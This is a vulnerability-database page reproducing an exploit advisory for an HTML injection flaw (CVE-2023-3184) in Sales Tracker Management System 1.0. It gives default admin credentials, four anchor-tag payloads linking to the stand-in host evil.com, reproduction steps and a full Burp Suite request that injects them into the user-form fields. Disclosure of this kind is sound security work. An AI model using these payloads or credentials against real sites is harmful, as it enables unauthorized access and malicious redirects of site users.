Lucene search
+L

Sales Tracker Management System 1.0 HTML Injection

🗓️ 14 Jun 2023 00:00:00Reported by AFFAN AHMEDType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 349 Views

Sales Tracker Management System v1.0 HTML Injection vulnerability Affected Version 1.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Sales Tracker Management System v1.0 - Multiple Vulnerabilities
13 Jun 202300:00
zdt
Circl
CVE-2023-3184
9 Jun 202316:21
circl
CNNVD
Sales Tracker Management System 跨站脚本漏洞
9 Jun 202300:00
cnnvd
CVE
CVE-2023-3184
9 Jun 202313:00
cve
Cvelist
CVE-2023-3184 SourceCodester Sales Tracker Management System cross site scripting
9 Jun 202313:00
cvelist
Exploit DB
Sales Tracker Management System v1.0 - Multiple Vulnerabilities
13 Jun 202300:00
exploitdb
EUVD
EUVD-2023-43865
3 Oct 202520:07
euvd
NVD
CVE-2023-3184
9 Jun 202313:15
nvd
OSV
CVE-2023-3184
9 Jun 202313:15
osv
Prion
Cross site scripting
9 Jun 202313:15
prion
Rows per page
`Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities   
Google Dork: NA  
Date: 09-06-2023  
EXPLOIT-AUTHOR: AFFAN AHMED  
Vendor Homepage: <https://www.sourcecodester.com/>  
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>  
Version: 1.0  
Tested on: Windows 11 + XAMPP  
CVE : CVE-2023-3184  
  
==============================  
CREDENTIAL TO USE  
==============================  
ADMIN-ACCOUNT  
USERNAME: admin  
PASSWORD: admin123  
  
=============================  
PAYLOAD_USED  
=============================  
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>  
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>  
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>  
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>  
  
  
===============================  
STEPS_TO_REPRODUCE  
===============================  
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN   
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`   
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename` `lastname` and in `username`   
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON  
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER IS ADDED .  
6. AFTER CLICKING ON THE EACH PAYLOAD IT REDIRECT ME TO EVIL SITE  
  
  
  
==========================================  
BURPSUITE_REQUEST  
==========================================  
POST /php-sts/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 1037  
sec-ch-ua:   
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36  
sec-ch-ua-platform: ""  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/php-sts/admin/?page=user/manage_user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn  
Connection: close  
  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="id"  
  
  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="firstname"  
  
<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="middlename"  
  
<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="lastname"  
  
<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="username"  
  
<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="password"  
  
1234  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="type"  
  
2  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundary7hwjNQW3mptDFOwo--  
  
===============================  
PROOF_OF_CONCEPT  
===============================  
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation